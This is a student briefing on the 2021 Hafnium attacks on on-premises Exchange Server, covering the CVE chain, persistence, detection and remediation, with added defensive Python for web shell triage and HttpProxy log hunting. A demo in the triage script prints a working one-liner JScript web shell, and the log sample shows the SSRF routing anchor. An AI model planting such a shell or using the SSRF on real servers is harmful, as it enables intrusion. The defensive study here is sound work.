Tech Briefing
Collin County Community College District
Course 2343, Information Systems
Dec 6, 2023
ITSY 2330 Technical Briefing Write-Up: Microsoft Exchange Server Hack

On March 2, 2021, Microsoft disclosed that on-premises Microsoft Exchange Server was under active attack through a chain of zero-day vulnerabilities; within days more than 30,000 US organizations were reported compromised (Carlson, 2021). Exchange Server provides email, calendaring and collaboration services to organizations ranging from large corporations to small businesses worldwide. Microsoft attributed the first wave to a Chinese state-sponsored group it named Hafnium and described as highly skilled. Although the group operates from China, it runs its attacks through leased virtual private servers in the US to hide its real location. Hafnium exploited the flaws first, but the web shells it left behind, and the exploit technique once it became public, let many other criminal and state actors gain administrative access to victims' systems. An attack of this kind can cause financial losses, loss of customer trust and reputational damage to organizations of any size, so a strong mitigation plan is essential to contain it and prevent a recurrence.

Initial Access

Hafnium gained its foothold either with stolen passwords or, far more often, by exploiting the zero-day vulnerabilities to impersonate an account that should have access; the exploit chain needs no user interaction, so phishing was not required. Only on-premises Exchange Server 2013, 2016 and 2019 were affected; Exchange Online was not, which left organizations still running their own servers the most exposed. Singh (2021) maps Hafnium's techniques onto 11 of the 14 MITRE ATT&CK tactics and identifies four zero-day vulnerabilities used against on-premises Exchange: CVE-2021-26855, a server-side request forgery in the Exchange front end that lets an unauthenticated attacker send arbitrary requests and authenticate as the Exchange server itself; CVE-2021-26857, an insecure deserialization bug in the Unified Messaging service that runs attacker code as SYSTEM; and CVE-2021-26858 and CVE-2021-27065, post-authentication arbitrary file writes that, chained with the SSRF, let the attacker drop a web shell anywhere on the server. Once inside, the attackers could pull mailboxes, contacts, calendars and other sensitive data, which in turn feeds spear phishing and further social engineering against the victim's staff and partners. Hafnium is a notable threat actor that targets many large entities, so it would not be surprising if it strikes again.

Propagation

Once Hafnium had access to Exchange, it used several techniques to move through the network, spanning reconnaissance, persistence, defense evasion and lateral movement.

Reconnaissance covers information gathering about a target that is later used to plan and launch the attack. In this campaign Hafnium only needed to learn whether a target ran Exchange and, if so, which version (Singh, 2021).

Persistence covers the tactics an adversary uses to keep its foothold after the initial compromise so that a reboot or an interrupted session does not lock it out. Hafnium dropped web shells into directories served by IIS, such as C:\inetpub\wwwroot\aspnet_client\ and the OWA auth directory, so that they survived restarts and stayed reachable even after the underlying vulnerability was patched (Singh, 2021). It also created backdoors by adding a domain account and granting it administrator privileges, giving an easy way back in for future operations.

Defense evasion covers methods for avoiding detection by users and security tools. Hafnium named its web shells to blend in with legitimate Exchange files (names such as help.aspx or errorEE.aspx) and placed them alongside genuine content, so neither an administrator browsing the directory nor a naive file-name check would notice them (Singh, 2021).
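The web shell persistence and naming tricks above are what a responder hunts for on disk. The following triage script is an added example, not code from this write-up or from any Microsoft tool: it walks a directory tree, flags ASP.NET script files whose content matches common one-liner web shell patterns, and records size and modification time so findings can be compared with a known-good baseline. The sample directory it builds (healthcheck.aspx, errorEE.aspx, web.config) and their contents are constructed for the demonstration; the paths in EXCHANGE_DROP_DIRS are the drop locations Microsoft published but are used here only as labels.

```python
import os
import re
import tempfile
from datetime import datetime, timedelta

# Drop locations named in Microsoft's Hafnium guidance; on a non-Windows host
# they serve only as labels for the report.
EXCHANGE_DROP_DIRS = (
    r"C:\inetpub\wwwroot\aspnet_client",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
)

# Content patterns common to ASP.NET one-liner web shells (China Chopper style).
INDICATORS = {
    "eval_of_request": re.compile(r"eval\s*\(\s*Request", re.IGNORECASE),
    "jscript_page":    re.compile(r'Language\s*=\s*"?JScript"?', re.IGNORECASE),
    "unsafe_eval":     re.compile(r'"unsafe"', re.IGNORECASE),
    "process_spawn":   re.compile(r"System\.Diagnostics\.Process", re.IGNORECASE),
    "runat_server":    re.compile(r'<script[^>]*runat\s*=\s*"?server"?', re.IGNORECASE),
}

SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx")


def classify_content(text):
    """Return the names of every indicator the file contents match."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def triage_directory(root, now=None, recent_days=60):
    """Walk `root` and report script files whose content looks like a web shell.

    Each finding records the indicators hit, the file size and whether the
    modification time falls inside the hunt window; the responder then compares
    the path against the drop directories above and a known-good baseline.
    """
    now = now or datetime.now()
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCRIPT_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = classify_content(fh.read())
            if not hits:
                continue
            mtime = datetime.fromtimestamp(os.path.getmtime(path))
            findings.append({
                "path": path,
                "name": name,
                "indicators": hits,
                "size": os.path.getsize(path),
                "modified_recently": (now - mtime) <= timedelta(days=recent_days),
            })
    # Most indicators first, then by path, so the loudest file tops the report.
    return sorted(findings, key=lambda f: (-len(f["indicators"]), f["path"]))


def demo():
    """Build a constructed aspnet_client directory and triage it (sample data only)."""
    with tempfile.TemporaryDirectory() as root:
        client_dir = os.path.join(root, "aspnet_client")
        os.makedirs(client_dir)
        # Constructed benign page: an ordinary server-side form with no eval.
        with open(os.path.join(client_dir, "healthcheck.aspx"), "w") as fh:
            fh.write('<%@ Page Language="C#" %>\n<html><body><form runat="server">'
                     '<asp:Label id="Status" runat="server" Text="OK" /></form></body></html>\n')
        # Constructed one-liner shell in the style Microsoft described: a JScript
        # page that evaluates whatever arrives in a request parameter. Its
        # legitimate-looking name is the point: the content, not the name, decides.
        with open(os.path.join(client_dir, "errorEE.aspx"), "w") as fh:
            fh.write('<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>\n')
        # Non-script support file that must be skipped.
        with open(os.path.join(client_dir, "web.config"), "w") as fh:
            fh.write("<configuration />\n")
        return triage_directory(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding["name"], finding["indicators"], finding["size"],
              "recent" if finding["modified_recently"] else "old")
```

On a real server you would point triage_directory at the IIS web root and the Exchange FrontEnd directory and compare every file it reports against what a clean install of the same build ships; a name that looks legitimate is exactly what the evasion paragraph warns about, so the content match is what drives the finding, and the size and modification time are context for the analyst.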
Lateral movement covers how the adversary extends control by moving from the first compromised host to others in the network. Hafnium used PsExec, a legitimate Microsoft Sysinternals administration utility that threat actors commonly abuse to run commands on remote systems (Singh, 2021). These are only some of the techniques used once the Exchange server had been breached. With them the attackers were able to compromise many systems across a network, which made the incident a top priority and greatly increased the potential damage.

Detection and Response to the Attack

Detecting Hafnium was not easy, because the group used several techniques to avoid drawing attention inside the servers it occupied. Detection combined manual and automated methods: endpoint detection and response tools such as CrowdStrike; Microsoft's published indicators of compromise (web shell paths and names, user agents and source IP addresses); and Microsoft's Test-ProxyLogon.ps1 script, which parses the Exchange HttpProxy, ECP and OABGenerator logs and the Windows Application event log for signs that each of the four CVEs was exploited. For administrators who could not patch immediately, Microsoft also released the Exchange On-premises Mitigation Tool (EOMT), which applies an interim URL rewrite mitigation and runs the Microsoft Safety Scanner.

Once the attack was identified, responders acted to limit the spread of the malware and reset the passwords of every affected account, then worked with the incident response team to assess the scale of the intrusion and identify the affected systems. Government also became involved: in April 2021 the FBI obtained court authorization to remove web shells that Hafnium had planted as backdoors from hundreds of US servers. Microsoft told IT administrators to apply the fixes immediately and to keep hunting for leftover backdoors, since patching closes the vulnerability but does not remove a web shell that is already in place. A plan was then drawn up to restore the affected systems and data. Over the following days Microsoft released security updates for every affected version, including out-of-support cumulative updates, so that attackers could not exploit any more
vulnerabilities. The remediation plan prioritized the most critical affected systems and restored compromised systems and data from known-good backups (backups can restore what was destroyed or altered, but they cannot undo the theft of data that was exfiltrated).

Conclusion

After the attack was mitigated, a post-mortem review focused on the main areas for improvement. Microsoft's April 2021 Patch Tuesday addressed 114 CVEs, about 19 of them rated critical, including further remote code execution vulnerabilities in Exchange Server (Carlson, 2021). Although those flaws were not linked to the Hafnium attacks, Microsoft warned that the risk of exploit code appearing for them was elevated and urged all customers to install the updates as soon as possible; CISA likewise ordered all federal agencies to apply the updates under Emergency Directive 21-02. Future attacks are likely, and the best defenses remain the basics: patch servers promptly, enforce strong passwords, and train users to recognize phishing and other forms of social engineering.
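An added example of the HttpProxy log hunt described under Detection and Response (not the write-up's own code and not Microsoft's Test-ProxyLogon.ps1, whose CVE-2021-26855 check it mirrors): the published indicator is a front-end request with an empty AuthenticatedUser whose AnchorMailbox matches ServerInfo~*/*. SAMPLE_LOG is a constructed excerpt in the shape of an Exchange HttpProxy log with the field list trimmed to the columns the hunt needs; host names, addresses, request IDs and timestamps are invented.

```python
import csv

# Constructed excerpt in the shape of an Exchange HttpProxy log. The #Fields list is
# trimmed to the columns this hunt needs; a real log carries many more columns.
# Hosts, addresses, request IDs and timestamps are invented sample data.
SAMPLE_LOG = """#Software: Microsoft Exchange Server
#Version: 15.01.2176.002
#Log-type: HttpProxy Logs
#Date: 2021-03-03T00:00:00.000Z
#Fields: DateTime,RequestId,Protocol,UrlStem,AuthenticationType,IsAuthenticated,AuthenticatedUser,AnchorMailbox,UserAgent,ClientIpAddress,HttpStatus
2021-03-03T01:12:44.101Z,req-0001,Autodiscover,/autodiscover/autodiscover.xml,Basic,true,CORP\\jsmith,Sid~S-1-5-21-1111111111-2222222222-3333333333-1105,Microsoft Office/16.0,10.20.30.40,200
2021-03-03T02:05:10.554Z,req-0002,Owa,/owa/auth/logon.aspx,,false,,,Mozilla/5.0 (Windows NT 10.0) Firefox/86.0,10.20.30.41,200
2021-03-03T03:41:07.889Z,req-0003,Autodiscover,/autodiscover/autodiscover.xml,,false,,ServerInfo~a]@exch01.corp.example:444/autodiscover/autodiscover.xml?#,python-requests/2.25.1,198.51.100.23,200
2021-03-03T03:41:09.120Z,req-0004,Ecp,/ecp/default.aspx,,false,,ServerInfo~a]@exch01.corp.example:444/ecp/default.aspx?#,python-requests/2.25.1,198.51.100.23,200
2021-03-03T03:55:32.007Z,req-0005,Autodiscover,/autodiscover/autodiscover.xml,,false,,ServerInfo~a]@exch01.corp.example:444/mapi/emsmdb/?#,ExchangeServicesClient/0.0.0.0,203.0.113.9,200
"""


def parse_httpproxy_log(text):
    """Parse the Exchange log layout: '#' header lines, with #Fields naming the CSV columns."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = [f.strip() for f in line[len("#Fields:"):].split(",")]
            continue
        if fields is None:
            raise ValueError("data row seen before the #Fields header")
        values = next(csv.reader([line]))
        rows.append(dict(zip(fields, values)))
    return rows


def is_serverinfo_anchor(anchor):
    """Equivalent of the 'ServerInfo~*/*' wildcard in Microsoft's published indicator."""
    return anchor.startswith("ServerInfo~") and "/" in anchor[len("ServerInfo~"):]


def hunt_cve_2021_26855(rows):
    """Unauthenticated requests routed with a ServerInfo~ anchor: the SSRF signature."""
    return [
        r for r in rows
        if r.get("AuthenticatedUser", "") == "" and is_serverinfo_anchor(r.get("AnchorMailbox", ""))
    ]


def summarize_by_source(matches):
    """Group hits by client address with first/last seen and the user agents used."""
    summary = {}
    for r in matches:
        entry = summary.setdefault(r["ClientIpAddress"], {
            "count": 0, "first": r["DateTime"], "last": r["DateTime"], "user_agents": set(),
        })
        entry["count"] += 1
        # ISO-8601 timestamps in one zone compare correctly as strings.
        entry["first"] = min(entry["first"], r["DateTime"])
        entry["last"] = max(entry["last"], r["DateTime"])
        entry["user_agents"].add(r["UserAgent"])
    return summary


def demo():
    """Run the hunt over the constructed log and return its per-source summary."""
    return summarize_by_source(hunt_cve_2021_26855(parse_httpproxy_log(SAMPLE_LOG)))


if __name__ == "__main__":
    for ip, entry in demo().items():
        print(ip, entry["count"], entry["first"], entry["last"], sorted(entry["user_agents"]))
```

The anonymous OWA logon request (req-0002) is not flagged even though it has no authenticated user, because its AnchorMailbox is empty; the rule fires only on the ServerInfo~ routing anchor that an unauthenticated client should never be able to produce. On a live server the same functions would be fed every file under the HttpProxy logging directory, and the summary's source addresses and user agents are what you compare against Microsoft's published indicator lists and feed to the incident response team for scoping.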
References

Carlson, B. (2021, May 6). The Microsoft Exchange Server hack: A timeline. CSO Online. https://www.csoonline.com/article/3616699/the-microsoft-exchange-server-hack-a-timeline.html

Singh, R. (2021, August 10). Techniques used by Hafnium to target Microsoft Exchange servers. Stellar Data Recovery Blog. https://www.stellarinfo.com/blog/techniques-used-by-hafnium-to-target-exchange-servers/

Osborne, C. (n.d.). Everything you need to know about the Microsoft Exchange Server hack. ZDNET. https://www.zdnet.com/article/everything-you-need-to-know-about-microsoft-exchange-server-hack/